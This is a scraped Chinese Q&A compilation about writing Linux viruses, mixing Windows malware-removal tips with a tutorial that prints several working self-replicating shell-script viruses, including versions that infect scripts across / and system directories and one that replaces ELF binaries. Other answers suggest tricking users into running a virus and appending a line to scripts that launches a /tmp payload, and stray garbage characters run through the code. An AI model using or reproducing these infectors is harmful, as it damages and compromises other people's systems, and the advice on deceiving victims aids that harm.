linux病毒編程

Ⅰ 有沒有人真實遇到過linux桌面的病毒/惡意程序

1.打開windows任務管理器，察看是否有可疑的進程（可以根據殺毒軟體的報告或者在網上搜索相關信息來判定）在運行，如果有把它結束。注意在system32目錄下的Rundll32.exe本身不是病毒，有可能一個dll文件在運行，他才可能是病毒或惡意程序之類的東西。由於windows任務管理器不能顯示進程的路徑，因此建議使用殺毒軟體自帶的進程察看和管理工具來查找並中止可疑進程。然後設法找到病毒程序文件（主要是你所中止的病毒進程文件，另外先在資源管理器的文件夾選項中，設置顯示所有文件和文件夾、顯示受保護的文件，再察看如system32文件夾中是否有不明dll或exe文件，C:\ProgramFilesC:\DocumentsandSettings\user\LocalSettings\TemporaryInternetFilesC:\DocumentsandSettings\user\LocalSettings\Temp等處是否有不明文件或病毒程序文件），然後刪去，搞清楚是否是系統文件再動手。2.有些病毒進程終止不了，提示「拒絕訪問」，或者出現「屢禁不止」的情況。根據我的經驗，有三種法供嘗試：A.可能是某些木馬病毒、流氓軟體等注冊為系統服務了。法是：察看控制面板〉管理工具〉服務，看有沒有與之相關的服務(特別是「描述」為空的)在運行，把它停止。再試著中止病毒進程並刪除。B.你可以嘗試安全模式下（開機後按F8選安全模式）用殺毒軟體處理，不行則再按步驟1和2A試一試。C.（慎用）使用冰刃等工具，察看病毒進程的線程信息和模塊信息，嘗試結束線程和解除模塊，再試著刪除病毒進程文件和相應的模塊。（慎用）3.如果稍微懂得注冊表使用的，可以再把相關的注冊表鍵值刪除。一般方法：開始〉運行，輸入regedit，確定，打開注冊表編輯器。編輯〉查找，查找目標為病毒進程名，在搜索結果中將與之有關的鍵值刪除。有時這樣做不能遏止病毒，還應嘗試使用步驟2中方法。4.某些病毒會劫持IE瀏覽器，導致亂彈網頁的狀況。建議用金山毒霸的金山反間諜2006等修復工具。看瀏覽器輔助對象BHO是否有可疑項目。有就修復它。修復失敗時參照1、2來做。5.其他提示：為了更好的操作，請先用優化大師或超級兔子清理所有臨時文件和上網時的緩存文件。一般病毒往往在臨時文件夾Temp中，這樣做可以幫你更快找到病毒文件。開始〉運行，輸入msconfig，確定，可以打開「系統配置實用程序」。選擇「啟動」，察看開機時載入的程序，如果在其中發現病毒程序，可以禁止它在開機時載入。不過此法治標不治本，甚至對某些程序來說無效。還是要按步驟1、2。6.說了這么多，不過有時還是不能解決。只好請教高人或格式化重做系統了，當然不推薦後者參考資料：

Ⅱ 如何編寫一個Linux病毒

得對Linux的內核原理很了解才能寫出來，否則的話不管你用C還是C++寫出的代碼生成可執行文件後到別人手一轉成源代碼什麼都看的真真的，起不到病毒的作用了。Linux開源就這一點好，一切都在掌控之中。心中有數！

Ⅲ 如何用Shell病毒技術感染Linux腳本程序

來看一個最原始的shell病毒,代碼最能說明問題:
---------------------------------------------------------
#shellvirus I
for file in *
do
cp $0 $file
done
--------------------------------------------------------- . ]2 |0 y9 I* w5 a# ~: b7 M
簡單吧?遍歷當前文件系統的所有文件,然後覆蓋所有文件.但是,我們知道linux是多用戶的操作系統,它的文件是具有
保護模式的,所以以上的腳本有可能會報出一大堆的錯誤,所以它很快就會被管理員發現並制止它的傳染.所以我們可以 E1 c. c1 o0 J! K" g% t
為該腳本做個判斷,這樣隱蔽性就大大增強了: - l1 x* l1 h# D
--------------------------------------------------------- 8 E. n; K- l1 S2 y6 P% ?
#shellvirus II
for file in * 0 n* r2 x5 f2 J; _
do # _, o4 |3 ~- M! T" g7 m7 L5 S
if test -f $file
then
if test -x $file ) g* x* n! W0 Z( B4 G3 |
then ! E" y7 |( G3 Z+ ~9 t
if test -w $file
then
if grep -s echo $file >.mmm
then * o0 ?& x7 b! M5 n
cp $0 $file ; @& P1 Y) {: P4 U$ ~
fi; fi; fi; fi; fi % ~' v' K% C! }* ^8 j7 O: M
done
rm .mmm -f + N- \" T# M1 w0 C
---------------------------------------------------------
ok.我們改進了一下,加了若乾的判斷,判斷文件是否存在,是否文件可執行,是否我們有許可權寫,再判斷它是否是腳本程序 2 D" v x% i' q& N
如果是就cp $0 $file,所以這段代碼是感然該系統所有的腳本程序的,危害性還是比較大的.if grep -s echo $file>/.mmm
這句也可以這樣寫:if file $file | grep -s ‚Bourne shell script‚ > /dev/nul ; then,也就是判斷file是否為shell
腳本程序. 8 I5 ^! _6 m- u) _2 {: G( \
但是,腳本病毒一旦在感染完畢之後就什麼也不做了,它沒有象二進制病毒那樣的潛伏的危害性,而且以上的腳本只是簡
單的覆蓋宿主而已,所以我這里利用了一下傳統的二進制病毒的感染機制,效果也不錯,看看下面代碼:
--------------------------------------------------------- . [! l( n. @* b/ C- s5 a+ m
#infection
head -n 24 $0 > .test<-取自身保存到.test % I' L, W" o% f5 V9 u7 ~. y9 g
for file in *<-遍歷文件系統 ; @& c6 ]+ @) D. s$ a# h0 d
do
if test -f $file<-判斷是否為文件 ) k7 ~7 p/ v* F& P7 z. N
then
if test -x $file<-判斷文件是否可執行
then / V6 h* K; ~: M! [3 D7 R0 G% K
if test -w $file<-判斷文件是否可寫
then % ^% D; y5 F% V" G
if grep -s echo $file >.mmm<-判斷是否為腳本程序
then
head -n 1 $file >.mm<-提取要感染的腳本程序的第一行
if grep -s infection .mm >.mmm<-判斷該文件是否已經被感染 A3 Z# g4 k% s$ H+ y8 {
then
rm -f .mm<-已經被感染,則跳過
else<-還未被感染 1 F f$ j% w5 N8 H C' H
cat $file > .SAVEE<-很熟悉吧?借用了傳統的二進制文件的感染機制
cat .test > $file
cat .SAVEE >> $file
fi; fi; fi; fi; fi
done
rm .test .SAVEE .mmm .mm -f 0 N+ y; e' C* ]: r
-------------------------------------------------------- 9 h c4 E$ H. _9 j- D
程序的註解足以說明了,其實增加了潛伏的危害性,但還是特容易被發現,沒辦法的事情,shell腳本一般都是明文的,呵呵.不過
危害性已經相當大了.這段程序用了一個感染標志:infection來判斷是否已經被感染,著在程序中可以反應出來. 5 @2 j; M! {4 }' k8 I+ P
ok,為了使上面的代碼不容易被發現,我必須優化它,最先考慮的肯定是精練代碼:
-------------------------------------------------------- 3 e, o3 d, ^* |
#infection " Z8 o" S% `$ @. M1 Z _
for file in * ;do
if test -f $file && test -x $file && test -w $file ; then 4 v( L5 w3 K3 z) W" G/ ?
if grep -s echo $file > /dev/nul ; then
head -n 1 $file >.mm
if grep -s infection .mm > /dev/nul ; then
rm .mm -f ; else 2 j1 j$ e6 B* E6 G, k: Y. i
cat $file > .SAVEE * u! D7 C( L/ y/ f) r( F% R2 w9 M: z0 l
head -n 13 $0 > $file
cat .SAVEE >> $file
fi; fi; fi $ I8 X M& \& T! Q# j9 b4 u2 _
done
rm .SAVEE .mm -f " f# I. U1 G+ C% @ T) A
--------------------------------------------------------
現在只有兩個臨時文件的產生了,代碼也被精簡到了13行.當然可以完全用;來把代碼甚至寫到1-2行,但這里我只是說明問題,就 4 s% P8 H( m/ A' [ d/ k& k
不寫出來了.
好,我們看看,shell病毒還能做哪些有用的事情,有可能我們想感染別的目錄的文件,比如根目錄或者是/etc,/bin等等,因為大多 & Y) |4 H# |) b% A" w
數有用的系統配置腳本都存放在那些目錄下,只要對上述代碼稍作改動就可以實現了 % [! @( ]1 A$ R% n/ z
--------------------------------------------------------
#infection
xtemp=$pwd<-保存當前路徑
head -n 22 $0 > /.test
for dir in /* ; do<-遍歷/目錄
if test -d $dir ; then<-如果是目錄就cd該目錄
cd $dir
for file in * ; do<-遍歷該目錄文件
if test -f $file && test -x $file && test -w $file ; then<-確定文件是否可執行,可寫
if grep -s echo $file > /dev/nul ; then<-確定是否為腳本程序
head -n 1 $file > .mm
if grep -s infection .mm > /dev/nul ; then<-確定是否已經被感染
rm .mm -f ; else & s6 _! g8 h' w, B/ c/ |
cat $file > /.SAVEE<-和前面的感染機制一樣感染未被感染的腳本程序 8 T( q& a% [' s
cat /.test > $file
cat /.SAVEE >> $file
fi; fi; fi $ R, l% c) y. f- I
done - j7 l& Q3 j2 w7 H* _
cd ..
fi
done & O( [: O9 L" E e( z; \
cd $xtemp<-返回原目錄
rm /.test /.SAVEE .mm -f ( _7 |' x. E: S. Z" s3 M
-------------------------------------------------------------
其實這段代碼只感染了/目錄下的一層目錄.當然我們可以使它感染的更深,只是加幾個循環而已.同樣shell病毒可以做很多事情
如download後門程序,為機器自動開後門,主動去攻擊聯網的其他機器,取用戶的email來發送傳染等等.總之它的實現技術不高深,
但也比較實用,還是值得去說明一下的,呵呵.
同樣,我們也可以感染elf文件,但危害性很小,這里不重點講,給個常式大家理解一下吧
-------------------------------------------------------------
for file in * ;do
if test -f $file && test -x $file && test -w $file ; then ; J/ ?- ~# s% h; [7 i6 @- f
if file $file | grep -s ‚ELF‚ > /dev/nul ; then
mv $file .$file
head -n 9 $0 > $file
fi; fi
done 6 H* o% e: l9 e- X. Y' U! d j
.$0' ]% |# H8 ?/ F

Ⅳ 病毒,實用性軟體，Linux操作系統的編程軟體是什麼

語言是具有相通性的，意思就是說你掌握一門以後，學另外一門會比較簡單。入門時候你學習一門就可以了。如果你真的想從一門具體的語言下手，各種語言有自己的優劣，下面介紹點，你可以選擇其中一種。

面向過程語言：
匯編：非常強大，強大到你可以操縱CPU的寄存器，內存以及任何你有權利可以操縱的硬體。學起來難度有一點，看你上面的意思是想寫病毒，那麼這門是不錯的選擇。

C語言：強大，沒有了對CPU的直接操縱，可以操作內存。非常靈活，推薦。

面向對象：
C++，C#等：微軟推崇，好處是有微軟支持，速度快，.net技術使其在網站這一塊有一席之地。絕大部分個人用戶電腦是windows，所以是游戲編程的不二之選。

JAVA：非常不錯的語言，SUN公司產品。最大優點莫過於其跨平台性。這點是藉助於它自己的虛擬機完成的，所以，編譯後的文件在windows下正常運行，拷貝到linux下依然可以正常運行。加上jsp技術的成熟，在網站這一塊更是重中之重。缺點就是速度慢。

看你的樣子是想學寫病毒，不過覺得你認識有點誤區，病毒是在別人電腦上跑才有用的，在自己機器上跑就沒啥意思了。所以無論你用啥寫，都是要傳到別人電腦上才行（不傳也可以，但一定要在別人機器的CPU和內存上運行）。這要求你有一定互聯網知識。或者你可以用欺騙的手段，將自己的病毒讓他們自己下載。比如告訴他們這是一個善意的東西。推薦語言就是C和匯編了。

到別人電腦後，要想辦法讓它運行。一般病毒都是搞竊取和破壞的，主要是一些重要文件，而操作系統對這些是有保護的。所以你要讓對方使用系統管理員的身份運行你的程序，或者利用操作系統的漏洞提升你的病毒進程的權利。windows常中病毒除了跟其本身缺陷有關外，還有一大部分原因是用戶不懂得自保，比如很多人的系統管理員是沒有密碼的。而linux在使用過程中對用戶有嚴格限制，而且很多人不推薦用超級用戶root身份使用linux.

linux下什麼語言都可以用，但linux本身是C寫的，他提供的系統調用都是C的函數，用C很方便。當然還有其他很多意想不到的好處，至於編譯器那麼GUN的GCC不錯，同時它也是C++的編譯器。至於IDE，我一直使用的是VIM，隨便你用什麼了。我見過用記事本寫JAVA的。

Ⅳ Linux系統平台下病毒種類主要有哪些

Linux系統平台下的病毒主要分為以下4類：
1、可執行文件型病毒，這個主要就是指能夠寄生在文件中的以文件為主要感染對象的病毒。
2、蠕蟲（worm）病毒，Linux平台下的蠕蟲病毒極為猖獗，像利用系統漏洞進行傳播的ramen、lion、Slapper等，這些病毒都感染了大量的Linux系統，造成了巨大的損失。
3、腳本病毒，這樣的多為使用shell腳本語言編寫的病毒，這類病毒編寫較為簡單，但破壞力卻同樣驚人，像以.sh結尾的腳本文件，一個短短數十行的shell腳本就可以在短時間內感染硬碟中所有的腳本文件。
4、後門程序，從增加系統超級用戶帳號的簡單後門，到利用系統服務載入、共享庫文件注射、rootkit工具包，甚至可以裝載內核模塊（LKM）而產生的後門，Linux平台下的後門技術發展非常成熟，隱蔽性強，難以清除，已經成為Linux系統管理員極為頭疼的問題。

Ⅵ 有多少人擅長在linux下 寫病毒和木馬

只有在linux的基底層寫病毒，才可能在所有linux系統之間有效傳播。否則沒什麼太多意義。目前為止，這樣的病毒很少，所以現在的linux可以不裝殺毒軟體。我的linux就沒裝。

Ⅶ 如何用shell病毒技術感染linux腳本程序

你這個思想很危險啊。。。echo "/bin/bash /tmp/test.sh" >> 腳本文件名字
這樣運行腳本就會運行你tmp下的test.sh文件
chmod 777 /tmp/test.sh給許可權
裡面寫。。。

Ⅷ 勒索病毒能在Linux上運行嗎

勒索病毒是通過電腦Windows系統的漏洞傳播的，Linux系統和Windows的系統並不一樣，無法在Linux系統上傳播和運行的。

Ⅸ linux，unix，windows，ios，安卓的病毒木馬都可以用c語言來編寫嗎

C語言當然可以編寫病毒，事實上很多程序都是用C/C++編寫出來的。 編程語言本身沒有「貴賤」之分，只用用好了，都是相當強的；區別在於主要適用范圍、編寫的難易程序、執行效率的高低、學習的難易程度，等等。 C語言只是一種計算機程序的編寫格式規范，到至於可以編寫出來什麼樣的程序，還要看你所用的C語言編譯器，（比如TC，VC，LCC，GCC等，太多了）。 如果有編寫windows程序，就不能用TC，它只能編寫DOS程序，而應該用VC，LCC，C++Builder等編譯工具） 編寫出來的程序肯定要調用操作系統提供的功能，如編windows程序，就要調用Win32 API,Dos程序則調用的是DOS中斷，編程實際上就是對這些操作系統所提供功能的調用。 現在的病毒很多都是用常用的編程工具編寫的，如VC++,delph,VC，Win32匯編等

Ⅹ linux 系統為什麼很安全 ，不中病毒

實際上Linux只是一個內核，具體的操作系統發行版有很多，但是Linux的安全性確實遠高於Windows 10以前的版本。原因如下：
1、Linux最早是基於x86處理器開發的，這點與Windows一樣，但由於微軟與英特爾的特殊關系使得微軟可以使用很多英特爾處理器上的秘密特性，這些特性極大的提高了Windows系統在英特爾平台上的運行效率，同時封閉的生態也滋生了很多由於特性造成的硬體漏洞，這一問題是隨著虛擬化技術的成熟而被逐步解決的；
2、Linux系統一般與GNU軟體相配合才能形成完整的操作系統，GNU作為MIT頂尖人才社區產物，程序質量有很高的保證，而且開源軟體往往比閉源軟體更容易暴露問題，所以GNU/Linux系統在上個世紀就經歷了完善期，黑客組織和情報機關幾乎不能找到世界上所有專家都發現不了的安全隱患，如果發現了也很難隱蔽地利用；
3、極度簡單的工程結構：眾所周知，越簡單的機械越難出錯誤，相比於長期迎合新需求的Windows，Linux各分發版都更加簡單高效，這使得Linux不是最豐富的平台確是最實用的平台，這也是科研人員十分青睞它的原因。